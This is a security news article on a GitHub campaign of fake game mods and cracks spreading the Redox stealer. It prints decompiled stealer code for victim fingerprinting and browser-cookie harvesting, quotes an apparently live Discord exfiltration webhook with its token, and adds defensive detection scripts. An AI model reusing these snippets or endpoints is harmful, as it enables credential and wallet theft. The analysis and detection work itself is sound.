Saturday, March 1, 2025

New GitHub Scam Uses Fake "Mods" and "Cracks" to Steal User Data


A sophisticated malware campaign leveraging GitHub repositories disguised as game modifications and cracked software has been uncovered, exposing a dangerous convergence of social engineering tactics and automated credential harvesting.

Security researchers identified over 1,100 malicious repositories distributing variants of the Redox stealer, a Python-based malware designed to exfiltrate sensitive data including cryptocurrency wallet keys, browser cookies, and gaming platform credentials.

Technical Architecture of the Redox Stealer

The malware operates through a multi-stage data harvesting process that begins with system reconnaissance.


Initial execution triggers a globalInfo() function that collects the victim's IP address, geolocation via the geolocation-db.com API, and Windows username using os.getenv('USERNAME').

Some of the placeholder images created by the author of that article and an example of a "Cracked" FL Studio repository readme

This data is formatted as Discord-flavoured Markdown for exfiltration:

import os
import requests

def globalInfo():
    # Victim fingerprint: public IP, Windows username, then a GeoIP lookup
    ip = getip()  # custom IP resolver, omitted in the decompiled code
    username = os.getenv('USERNAME')
    ipdata = requests.get(f"https://geolocation-db.com/jsonp/{ip}").json()
    # Rendered as a Discord message: flag emoji, then username, IP and country
    return f":flag_{ipdata['country_code']}: - `{username.upper()} | {ip} ({ipdata['country_name']})`"

Obfuscation techniques include base64-encoded Discord webhook URLs split across multiple variables (magic, love, god, destiny) to evade static analysis.

When reconstructed, these strings resolve to active webhooks such as https://discord.com/api/webhooks/1050437982584324138/VJByvmBKESSUv4fYn0LIjlBR4VzMRTEPOKVJoWFvCeHd7o3LtclQMJDMuiLzT57iqn7B, which serve as centralized logging endpoints for the attackers.
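Recovering the webhook from a sample does not require running it. The added example below (not the researchers' code, and not taken from a Redox sample) parses a Python file with the standard ast module, evaluates string and bytes constants joined with +, base64-decodes each reassembled value, and searches for a Discord webhook URL. It also decodes the snowflake ID in the URL to the webhook's creation time, a quick way to judge how old an operator's infrastructure is. The variable names, the chunk size and the placeholder webhook ID and token are assumptions constructed for the demo; the make_sample_source helper builds the obfuscated input so that no real webhook is embedded.

```python
import ast
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional

# Discord webhook URL: numeric snowflake ID, then the secret token.
WEBHOOK_RE = re.compile(
    rb"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/[A-Za-z0-9_\-]+"
)
DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z, the Discord snowflake epoch


def make_sample_source(url: str, chunk: int = 24) -> str:
    """Build a constructed stealer-like snippet: the URL is base64-encoded and
    split across harmless-looking variables, then reassembled at run time.
    The caller passes a placeholder URL; nothing here is a real webhook."""
    enc = base64.b64encode(url.encode()).decode()
    parts = [enc[i:i + chunk] for i in range(0, len(enc), chunk)]
    names = ["magic", "love", "god", "destiny", "joy", "trust"]
    names += [f"v{i}" for i in range(len(names), len(parts))]
    lines = [f'{names[i]} = b"{p}"' for i, p in enumerate(parts)]
    lines.append("webhook = " + " + ".join(names[:len(parts)]))
    return "\n".join(lines) + "\n"


def _resolve(node: ast.AST, env: Dict[str, bytes]) -> Optional[bytes]:
    """Evaluate str/bytes constants and `+` chains over already-seen names."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (bytes, str)):
        return node.value if isinstance(node.value, bytes) else node.value.encode()
    if isinstance(node, ast.Name):
        return env.get(node.id)
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = _resolve(node.left, env), _resolve(node.right, env)
        if left is not None and right is not None:
            return left + right
    return None


def extract_webhooks(source: str) -> List[str]:
    """Statically recover Discord webhook URLs from a Python sample, whether
    they appear in clear text or only after reassembling base64 chunks."""
    env: Dict[str, bytes] = {}
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)):
            value = _resolve(node.value, env)
            if value is not None:
                env[node.targets[0].id] = value
    found = set()
    for value in env.values():
        candidates = [value]
        try:
            padded = value + b"=" * (-len(value) % 4)
            candidates.append(base64.b64decode(padded, validate=True))
        except (binascii.Error, ValueError):
            pass  # not base64: keep only the raw value
        for blob in candidates:
            for match in WEBHOOK_RE.finditer(blob):
                found.add(match.group(0).decode())
    return sorted(found)


def webhook_created_at(url: str) -> datetime:
    """Decode the snowflake ID to the webhook's creation time (UTC)."""
    match = WEBHOOK_RE.search(url.encode())
    if not match:
        raise ValueError("not a Discord webhook URL")
    ms = (int(match.group(1)) >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


if __name__ == "__main__":
    # Placeholder ID/token constructed for this example, not a live webhook.
    PLACEHOLDER = "https://discord.com/api/webhooks/000000000000000000/CONSTRUCTED_EXAMPLE_TOKEN"
    sample = make_sample_source(PLACEHOLDER)
    print(sample)
    for hook in extract_webhooks(sample):
        print(hook, "created", webhook_created_at(hook).isoformat())
```

Decoding each chunk on its own yields garbage, which is exactly why the split defeats grep-style scanners; the resolver only decodes after the + chain is rebuilt. Once a URL is recovered, a GET request to it returns the webhook's metadata without posting anything, and the ID alone is enough to request takedown from Discord.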

GitHub fake account

Repository Social Engineering Tactics

Attackers employ algorithmic repository generation techniques outlined in a now-deleted "social engineering" forum guide. Key tactics include:

  1. Topic Poisoning: Repositories are tagged with search-optimized phrases like free Roblox aimbot download or FL Studio crack for PC, exploiting GitHub's topic system to surface in Google searches. A script detected 38,000 potential malicious topics derived from base keywords (valorant, photoshop) combined with modifiers (cracked, hack).
  2. Readme Fabrication: ChatGPT-generated descriptions accompanied by forged VirusTotal "0/70 malware" screenshots build credibility. One repository for a fake Valorant aimbot ranked #9 in Google search results despite containing an issue labeled "DANGER: MALWARE".
  3. Binary Obfuscation: Malicious payloads are distributed as password-protected RAR archives or hosted on Anonfiles to bypass GitHub's automated malware scanning.

Automated Data Harvesting Workflow

The Redox payload uses SQLite queries to extract credentials from browsers (Chrome, Edge) and from applications such as Steam and Discord:

import base64, os, pickle, shutil, sqlite3, tempfile

def getCookie(path, arg):  # `arg` is unused in the decompiled excerpt
    # Chromium locks the live cookie DB, so the stealer queries a copy; this
    # copy step is missing from the excerpt and is reconstructed here.
    tempfold = os.path.join(tempfile.gettempdir(), 'cookies')
    shutil.copy2(path, tempfold)
    conn = sqlite3.connect(tempfold)
    cursor = conn.cursor()
    # Chromium cookie schema: host, cookie name, AES/DPAPI-encrypted value
    cursor.execute('SELECT host_key, name, encrypted_value FROM cookies')
    data = cursor.fetchall()  # decryption via DPAPI omitted
    return base64.b64encode(pickle.dumps(data))

Files matching keywords (metamask, exodus, riotgames) are zipped and uploaded to Anonfiles using multithreaded workers.

"how to start decorating a repository"

The Kiwi() module recursively scans directories for documents containing terms like "password" or "bank", prioritizing the Desktop, Downloads, and Documents folders.
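The harvesting chain described in this section and the previous one leaves a distinctive network footprint on the victim host: a GET to geolocation-db.com, then a POST to a Discord webhook, then an upload to Anonfiles, all within seconds. The added example below (detection logic written for this page, not the researchers' tooling) correlates those three stages per client over a proxy log. The log format ("timestamp client method url"), the client addresses, the placeholder webhook and the 10-minute window are assumptions constructed for the demo; the Anonfiles upload URL is also part of the constructed sample.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed proxy log, "timestamp client method url" per line. Not a real
# capture; the webhook ID/token and client addresses are placeholders.
SAMPLE_LOG = """\
2025-02-27T14:02:11Z 10.0.5.21 GET https://geolocation-db.com/jsonp/203.0.113.9
2025-02-27T14:02:13Z 10.0.5.21 POST https://discord.com/api/webhooks/000000000000000000/CONSTRUCTED_EXAMPLE_TOKEN
2025-02-27T14:02:40Z 10.0.5.21 POST https://api.anonfiles.com/upload
2025-02-27T14:05:00Z 10.0.5.33 GET https://geolocation-db.com/jsonp/198.51.100.7
2025-02-27T15:10:00Z 10.0.5.33 POST https://discord.com/api/webhooks/000000000000000000/CONSTRUCTED_EXAMPLE_TOKEN
2025-02-27T14:20:00Z 10.0.5.40 POST https://discord.com/api/webhooks/000000000000000000/CONSTRUCTED_EXAMPLE_TOKEN
2025-02-27T14:21:00Z 10.0.5.40 GET https://github.com/
"""

# Stages of the chain described in the article, in the order the stealer runs them.
STAGES = [
    ("recon", re.compile(r"^https?://geolocation-db\.com/")),
    ("webhook", re.compile(r"^https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/")),
    ("upload", re.compile(r"^https?://(?:[\w-]+\.)*anonfiles\.com/")),
]
STAGE_ORDER = [name for name, _ in STAGES]


def classify(method: str, url: str) -> Optional[str]:
    """Map one request to a chain stage, or None. Data leaves via POST, so the
    exfil stages require POST; the GeoIP lookup is a plain GET."""
    for name, pattern in STAGES:
        if pattern.search(url):
            if name == "recon" or method.upper() == "POST":
                return name
    return None


def detect(log: str, window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Alert when a client performs the GeoIP lookup and then posts to a Discord
    webhook within `window`; an Anonfiles upload in the same window raises severity."""
    events = defaultdict(list)
    for line in log.strip().splitlines():
        ts, client, method, url = line.split(maxsplit=3)
        stage = classify(method, url)
        if stage:
            events[client].append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), stage))
    alerts = []
    for client, evs in events.items():
        evs.sort()
        for i, (t0, s0) in enumerate(evs):
            if s0 != "recon":
                continue
            seen = {"recon"}
            for t, s in evs[i + 1:]:
                if t - t0 > window:
                    break
                seen.add(s)
            if "webhook" in seen:
                alerts.append({
                    "client": client,
                    "start": t0.isoformat(),
                    "stages": [s for s in STAGE_ORDER if s in seen],
                    "severity": "high" if "upload" in seen else "medium",
                })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

A lone webhook POST is deliberately not an alert on its own, since CI systems and chat integrations post to Discord webhooks legitimately; the GeoIP lookup immediately before it is what makes the sequence stealer-shaped. Where the webhook URL recovered from a sample is known (the one quoted above, for instance), pinning its ID into the webhook pattern turns this from a behavioural rule into an exact indicator match.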

A custom Python crawler identified 1,115 suspicious repositories, 351 of which matched the "README + archive" structure indicative of malware.
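The crawler's "README + archive" test and the topic-poisoning tactics listed earlier can be turned into a simple triage score for hunting lures of this kind. The added example below is written for this page, not the researchers' crawler: it generates keyword-by-modifier topic permutations, then scores a repository on poisoned topics, an archive-only file tree with no source, a VirusTotal clean-scan claim, a published archive password, and an Anonfiles link. The keyword lists, the weights, the threshold and the two sample repositories are assumptions constructed for the demo; neither repository is a real GitHub project.

```python
import itertools
import re
from dataclasses import dataclass
from typing import List, Set, Tuple

# Small illustrative keyword/modifier lists; the script in the article used
# far more, yielding 38,000 permutations.
BASE_KEYWORDS = ["valorant", "roblox", "photoshop", "fl-studio"]
MODIFIERS = ["crack", "cracked", "hack", "aimbot", "free-download"]
ARCHIVE_EXT = (".rar", ".zip", ".7z")
SOURCE_EXT = (".py", ".c", ".cpp", ".cs", ".js", ".ts", ".go", ".rs", ".java")


def poisoned_topics() -> Set[str]:
    """Every keyword/modifier pairing in both orders, as hyphenated GitHub topics."""
    topics = set()
    for k, m in itertools.product(BASE_KEYWORDS, MODIFIERS):
        topics.update({f"{k}-{m}", f"{m}-{k}"})
    return topics


@dataclass
class Repo:
    name: str
    topics: List[str]
    files: List[str]  # paths in the default branch
    readme: str


def triage(repo: Repo, bad_topics: Set[str]) -> Tuple[int, List[str]]:
    """Score a repository against the lure pattern; higher means more suspicious."""
    score, reasons = 0, []
    hits = sorted({t.lower() for t in repo.topics} & bad_topics)
    if hits:
        score += 2
        reasons.append("poisoned topics: " + ", ".join(hits))
    non_readme = [f for f in repo.files if not f.lower().startswith("readme")]
    archives = [f for f in non_readme if f.lower().endswith(ARCHIVE_EXT)]
    source = [f for f in non_readme if f.lower().endswith(SOURCE_EXT)]
    if archives and not source:
        score += 3
        reasons.append("README + archive structure with no source files")
    if re.search(r"virustotal|\b0\s*/\s*\d{2}\b", repo.readme, re.I):
        score += 2
        reasons.append("claims a clean VirusTotal result")
    if re.search(r"\bpassword\b\s*[:=]", repo.readme, re.I):
        score += 1
        reasons.append("archive password published in README")
    if re.search(r"\banonfiles\.com\b", repo.readme, re.I):
        score += 2
        reasons.append("payload hosted off-platform on Anonfiles")
    return score, reasons


def is_suspicious(repo: Repo, bad_topics: Set[str], threshold: int = 5) -> bool:
    return triage(repo, bad_topics)[0] >= threshold


# Constructed repositories for the demo; neither is a real GitHub project.
LURE = Repo(
    name="Valorant-Aimbot-2025",
    topics=["valorant-aimbot", "valorant-hack", "free-download-valorant"],
    files=["README.md", "Valorant_Aimbot_v3.rar"],
    readme=("Undetected Valorant aimbot. VirusTotal: 0/70 malware.\n"
            "Download mirror: https://anonfiles.com/example\nPassword: cheats4u"),
)
LEGIT = Repo(
    name="cookie-parser",
    topics=["http", "cookies", "python"],
    files=["README.md", "setup.py", "src/cookie_parser.py", "tests/test_parser.py"],
    readme="A small RFC 6265 cookie parser. Install with pip and run the tests.",
)

if __name__ == "__main__":
    bad = poisoned_topics()
    for repo in (LURE, LEGIT):
        print(repo.name, *triage(repo, bad))
```

The archive-only check carries the most weight because it is the structural signal the crawler keyed on: a genuine cheat or crack project almost always ships source, while a lure ships one README and one password-protected archive that GitHub's scanners cannot open.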

Although 10% of the repos had user-reported issues, only 3% (11 repos) were flagged as malicious, a 97% success rate in evading detection.

Researchers estimate each repository generates 1–3 compromised systems ("logs") daily, suggesting up to 3,345 victims monthly per operator.

GitHub's Response and Mitigation Challenges

Despite GitHub's malware detection systems, repositories remain active because of:

  • Delayed Takedowns: Attackers regenerate banned repositories using automated topic permutations.
  • Legitimate-Looking Activity: Accounts with realistic commit histories and star counts bypass heuristic analysis.
  • Encrypted Payloads: RAR passwords ("cheats4u") prevent static code analysis.

The researcher's spreadsheet of confirmed malicious repos has not yet triggered bulk takedowns, highlighting gaps in proactive monitoring.

As one forum user lamented, "Script kiddies flooded GitHub with fake cracks—now even real ones get flagged", underscoring the collateral damage of these campaigns. GitHub has yet to comment on planned detection improvements.

This campaign illustrates the evolving misuse of open-source platforms for large-scale social engineering.

With Redox's codebase needing only about 1,000 lines of Python to automate credential harvesting, developers must remain vigilant against too-good-to-be-true repositories, even on trusted platforms like GitHub.
